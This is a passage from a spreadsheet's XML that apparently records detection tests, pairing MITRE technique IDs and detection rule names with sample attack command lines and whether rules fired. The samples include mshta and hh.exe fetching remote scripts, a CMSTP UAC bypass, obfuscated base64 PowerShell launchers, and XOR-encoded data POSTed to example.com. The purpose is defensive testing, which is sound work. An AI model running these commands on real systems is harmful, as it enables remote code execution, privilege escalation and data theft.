          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows (b471f462-eb0d-4832-be35-28d94bdb4780); Remote Access Tool - Potential MeshAgent Execution - Windows (2fbbe9ff-0afc-470b-bdc0-592198339968)</t>
        </is>
      </c>
      <c r="J3261" s="43" t="n"/>
      <c r="K3261" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3262" ht="15.75" customHeight="1" s="42">
      <c r="A3262" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3262" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_remote_download_or_execution</t>
        </is>
      </c>
      <c r="C3262" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE</t>
        </is>
      </c>
      <c r="D3262" s="43" t="inlineStr">
        <is>
          <t>f57c58b3-ee69-4ef5-9041-455bf39aaa89</t>
        </is>
      </c>
      <c r="E3262" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "hh.exe htt^ps://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm)"</t>
        </is>
      </c>
      <c r="F3262" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3262" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3262" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3262" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3262" s="43" t="n"/>
      <c r="K3262" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3263" ht="15.75" customHeight="1" s="42">
      <c r="A3263" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B3263" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C3263" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D3263" s="43" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E3263" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "mshta.exe javascript:a=GetObject('script:htt^ps://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct)').Exec();close()"</t>
        </is>
      </c>
      <c r="F3263" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3263" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3263" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3263" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J3263" s="43" t="n"/>
      <c r="K3263" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3264" ht="15.75" customHeight="1" s="42">
      <c r="A3264" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B3264" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_javascript</t>
        </is>
      </c>
      <c r="C3264" s="43" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D3264" s="43" t="inlineStr">
        <is>
          <t>67f113fa-e23d-4271-befa-30113b3e08b1</t>
        </is>
      </c>
      <c r="E3264" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "mshta.exe java^script:a=GetObject('script:[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct)').Exec();close()"</t>
        </is>
      </c>
      <c r="F3264" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3264" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3264" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3264" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J3264" s="43" t="n"/>
      <c r="K3264" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3265" ht="15.75" customHeight="1" s="42">
      <c r="A3265" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3265" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_installscreensaver</t>
        </is>
      </c>
      <c r="C3265" s="43" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution</t>
        </is>
      </c>
      <c r="D3265" s="43" t="inlineStr">
        <is>
          <t>15bd98ea-55f4-4d37-b09a-e7caa0fa2221</t>
        </is>
      </c>
      <c r="E3265" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "rundll32.exe desk.cpl,InstallScreen^Saver not_an_scr.scr"</t>
        </is>
      </c>
      <c r="F3265" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3265" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3265" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3265" s="43" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution (15bd98ea-55f4-4d37-b09a-e7caa0fa2221)</t>
        </is>
      </c>
      <c r="J3265" s="43" t="n"/>
      <c r="K3265" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3266" ht="15.75" customHeight="1" s="42">
      <c r="A3266" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3266" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C3266" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D3266" s="43" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E3266" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cmstp.exe /^s "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003_uacbypass.inf" /^a^u"</t>
        </is>
      </c>
      <c r="F3266" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3266" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3266" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3266" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP (e66779cc-383e-4224-a3a4-267eeb585c40)</t>
        </is>
      </c>
      <c r="J3266" s="43" t="n"/>
      <c r="K3266" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3267" ht="15.75" customHeight="1" s="42">
      <c r="A3267" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3267" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_commandline_path_traversal_evasion</t>
        </is>
      </c>
      <c r="C3267" s="43" t="inlineStr">
        <is>
          <t>Potential Command Line Path Traversal Evasion Attempt</t>
        </is>
      </c>
      <c r="D3267" s="43" t="inlineStr">
        <is>
          <t>1327381e-6ab0-4f38-b583-4c1b8346a56b</t>
        </is>
      </c>
      <c r="E3267" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set UP=..&amp;&amp; call C:\Windows\%UP%\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F3267" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3267" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3267" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3267" s="43" t="inlineStr">
        <is>
          <t>Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J3267" s="43" t="n"/>
      <c r="K3267" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3268" ht="15.75" customHeight="1" s="42">
      <c r="A3268" s="43" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B3268" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir</t>
        </is>
      </c>
      <c r="C3268" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory</t>
        </is>
      </c>
      <c r="D3268" s="43" t="inlineStr">
        <is>
          <t>fff9d2b7-e11c-4a69-93d3-40ef66189767</t>
        </is>
      </c>
      <c r="E3268" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c cd /d %SystemRoot%\System32 &amp;&amp; copy cmd.exe %SystemRoot%\Temp\lsass.exe</t>
        </is>
      </c>
      <c r="F3268" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3268" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3268" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3268" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3268" s="43" t="n"/>
      <c r="K3268" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3269" ht="15.75" customHeight="1" s="42">
      <c r="A3269" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B3269" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hidden_dir_index_allocation</t>
        </is>
      </c>
      <c r="C3269" s="43" t="inlineStr">
        <is>
          <t>Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI</t>
        </is>
      </c>
      <c r="D3269" s="43" t="inlineStr">
        <is>
          <t>0900463c-b33b-49a8-be1d-552a3b553dae</t>
        </is>
      </c>
      <c r="E3269" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c set STREAM=::$index_allocation &amp;&amp; md %temp%\...$.......%STREAM% &amp; echo too many secrets &gt; %temp%\...$.......%STREAM%\secrets.txt</t>
        </is>
      </c>
      <c r="F3269" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3269" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3269" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3269" s="43" t="inlineStr">
        <is>
          <t>Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI (0900463c-b33b-49a8-be1d-552a3b553dae)</t>
        </is>
      </c>
      <c r="J3269" s="43" t="n"/>
      <c r="K3269" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3270" ht="15.75" customHeight="1" s="42">
      <c r="A3270" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3270" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C3270" s="43" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D3270" s="43" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E3270" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$plaintext = ([system.Text.Encoding]::UTF8.getBytes("Path\n----\nC:\Users\victim"))
$key = "abcdefghijklmnopqrstuvwxyz123456"
$cyphertext =  @();
for	($i = 0; $i -lt $plaintext.Count; $i++) {
 $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
}
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext}</t>
        </is>
      </c>
      <c r="F3270" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3270" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3270" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3270" s="43" t="n"/>
      <c r="J3270" s="43" t="n"/>
      <c r="K3270" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3271" ht="15.75" customHeight="1" s="42">
      <c r="A3271" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3271" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C3271" s="43" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D3271" s="43" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E3271" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$plaintext = ([system.Text.Encoding]::UTF8.getBytes("Path\n----\nC:\Users\victim"))
$key = "abcdefghijklmnopqrstuvwxyz123456"
$cyphertext =  @();
for ($i = 0; $i -lt $plaintext.Count; $i++) {
 $cyphertext += $plaintext[$i] ".((Get-Variable *md*).Value.Name[10]+'xor')".Invoke($key[$i % $key.Length]);
}
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext}</t>
        </is>
      </c>
      <c r="F3271" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3271" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3271" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3271" s="43" t="n"/>
      <c r="J3271" s="43" t="n"/>
      <c r="K3271" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3272" ht="15.75" customHeight="1" s="42">
      <c r="A3272" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3272" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3272" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3272" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3272" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F3272" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3272" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3272" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3272" s="43" t="n"/>
      <c r="J3272" s="43" t="n"/>
      <c r="K3272" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3273" ht="15.75" customHeight="1" s="42">
      <c r="A3273" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3273" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C3273" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D3273" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E3273" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -NoProfile -W H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F3273" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3273" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3273" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3273" s="43" t="n"/>
      <c r="J3273" s="43" t="n"/>
      <c r="K3273" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3274" ht="15.75" customHeight="1" s="42">
      <c r="A3274" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3274" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C3274" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D3274" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E3274" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -executIONpolicY Bypass -nop -"W" H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F3274" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3274" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3274" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3274" s="43" t="n"/>
      <c r="J3274" s="43" t="n"/>
      <c r="K3274" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3275" ht="15.75" customHeight="1" s="42">
      <c r="A3275" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3275" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C3275" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D3275" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E3275" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eXecutiONpolIcY Bypass /"NoProfile" -W H /"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F3275" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3275" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3275" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3275" s="43" t="n"/>
      <c r="J3275" s="43" t="n"/>
      <c r="K3275" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3276" ht="15.75" customHeight="1" s="42">
      <c r="A3276" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3276" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C3276" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D3276" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E3276" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -nop -w H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F3276" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3276" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3276" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3276" s="43" t="n"/>
      <c r="J3276" s="43" t="n"/>
      <c r="K3276" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3277" ht="15.75" customHeight="1" s="42">
      <c r="A3277" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3277" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C3277" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D3277" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E3277" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eXEcUtiOnpOLIcy Bypass -nop -w H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F3277" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3277" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3277" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3277" s="43" t="n"/>
      <c r="J3277" s="43" t="n"/>
      <c r="K3277" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3278" ht="15.75" customHeight="1" s="42">
      <c r="A3278" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3278" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C3278" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D3278" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E3278" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -nop -W H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F3278" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3278" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3278" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3278" s="43" t="n"/>
      <c r="J3278" s="43" t="n"/>
      <c r="K3278" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3279" ht="15.75" customHeight="1" s="42">
      <c r="A3279" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3279" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C3279" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D3279" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E3279" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F3279" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3279" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3279" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3279" s="43" t="n"/>
      <c r="J3279" s="43" t="n"/>
      <c r="K3279" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3280" ht="15.75" customHeight="1" s="42">
      <c r="A3280" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3280" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C3280" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D3280" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3280" s="43" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F3280" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3280" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3280" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3280" s="43" t="n"/>
      <c r="J3280" s="43" t="n"/>
      <c r="K3280" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3281" ht="15.75" customHeight="1" s="42">
      <c r="A3281" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3281" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C3281" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D3281" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3281" s="43" t="inlineStr">
        <is>
          <t>cmd /C "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F3281" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3281" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3281" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3281" s="43" t="n"/>
      <c r="J3281" s="43" t="n"/>
      <c r="K3281" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3282" ht="15.75" customHeight="1" s="42">
      <c r="A3282" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3282" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C3282" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D3282" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3282" s="43" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c " iex([System.Windows.Forms.Clipboard]::GetText())""</t>
        </is>
      </c>
      <c r="F3282" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3282" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3282" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3282" s="43" t="n"/>
      <c r="J3282" s="43" t="n"/>
      <c r="K3282" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3283" ht="15.75" customHeight="1" s="42">
      <c r="A3283" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3283" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C3283" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D3283" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3283" s="43" t="inlineStr">
        <is>
          <t>cmd /C "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c " iex([System.Windows.Forms.Clipboard]::GetText())""</t>
        </is>
      </c>
      <c r="F3283" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3283" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3283" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3283" s="43" t="n"/>
      <c r="J3283" s="43" t="n"/>
      <c r="K3283" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3284" ht="15.75" customHeight="1" s="42">
      <c r="A3284" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3284" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C3284" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D3284" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3284" s="43" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F3284" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3284" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3284" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3284" s="43" t="n"/>
      <c r="J3284" s="43" t="n"/>
      <c r="K3284" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3285" ht="15.75" customHeight="1" s="42">
      <c r="A3285" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3285" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C3285" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D3285" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3285" s="43" t="inlineStr">
        <is>
          <t>cmd /C "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F3285" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3285" s="43" t="b">
        <v>0</v>
      </c>
